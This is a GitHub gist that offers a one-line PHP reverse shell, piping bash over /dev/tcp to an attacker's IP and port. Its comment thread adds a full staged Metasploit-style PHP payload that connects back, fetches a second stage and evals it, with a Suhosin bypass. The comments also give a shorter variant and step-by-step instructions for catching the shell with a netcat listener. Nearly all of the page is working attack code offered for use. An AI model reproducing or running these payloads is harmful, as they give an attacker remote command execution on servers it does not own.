Skip to content

Instantly share code, notes, and snippets.

@rshipp
Created July 17, 2014 15:06
Show Gist options
  • Save rshipp/eee36684db07d234c1cc to your computer and use it in GitHub Desktop.
Save rshipp/eee36684db07d234c1cc to your computer and use it in GitHub Desktop.
A tiny PHP/bash reverse shell.
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'");
@dbstreif
Copy link

dbstreif commented May 30, 2020

This will work with any operating system on a server. This is a module from Rapid7 that should be used with their handler but you don't have to. Keep in mind this is a staged payload.
/*<?php /**/ error_reporting(0); $ip = 'PUT YOUR IP'; $port = PUT YOUR PORT; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();

@Cvar1984
Copy link

Cvar1984 commented Apr 7, 2022

it was bash not a php

@SergioChicoITCL
Copy link

it was bash not a php
@Cvar1984

It uses PHP to call a system command that opens a TCP socket that serves a bash shell to an IP/port.
Then you can connect to that IP/port and get access to this bash shell.
The script from the first post only works in unix-based OS with bash shell executable in the "/bin/" path.

@Cvar1984
Copy link

Cvar1984 commented Apr 7, 2022

it was bash not a php
@Cvar1984

It uses PHP to call a system command that opens a TCP socket that serves a bash shell to an IP/port. Then you can connect to that IP/port and get access to this bash shell. The script from the first post only works in unix-based OS with bash shell executable in the "/bin/" path.

Yea i know it spawn bash using php system call

@Cvar1984
Copy link

Cvar1984 commented Apr 7, 2022

Then this is the tiniest

<?=`"/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'"`?>

@dbstreif
Copy link

dbstreif commented Apr 7, 2022

it was bash not a php
@Cvar1984

It uses PHP to call a system command that opens a TCP socket that serves a bash shell to an IP/port. Then you can connect to that IP/port and get access to this bash shell. The script from the first post only works in unix-based OS with bash shell executable in the "/bin/" path.

Yea i know it spawn bash using php system call

Yes but the solution from rapid7 works on any operating system because it does not utilize any system calls.

@85406043
Copy link

85406043 commented Jun 5, 2022

eu não sei qual ip usar, alguém me ajuda por gentileza !

@85406043
Copy link

85406043 commented Jun 5, 2022

estou em vpn ! em uma maquina virtual ! eu não sei se uso o da conexão vpn, da maquina virtualizada ou da minha propria maquina !

@SergioChicoITCL
Copy link

estou em vpn ! em uma maquina virtual ! eu não sei se uso o da conexão vpn, da maquina virtualizada ou da minha propria maquina !

@85406043

  1. You have two machines, the attacker and the victim. The victim must have network access to the attacker. (Same network, if you are in a VPN , both machines must be in that network, and those are the important IPs )
  2. You have to open a listening port in your attacking machine, (nc -nvlp 1234)
  3. You have to open a reverse shell, and point it to your attacking machine (VPN IP and open listening port)

And thats all.

@85406043
Copy link

85406043 commented Jun 6, 2022

@SergioChicoITCL muito obrigado campeão ! você é demais !

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment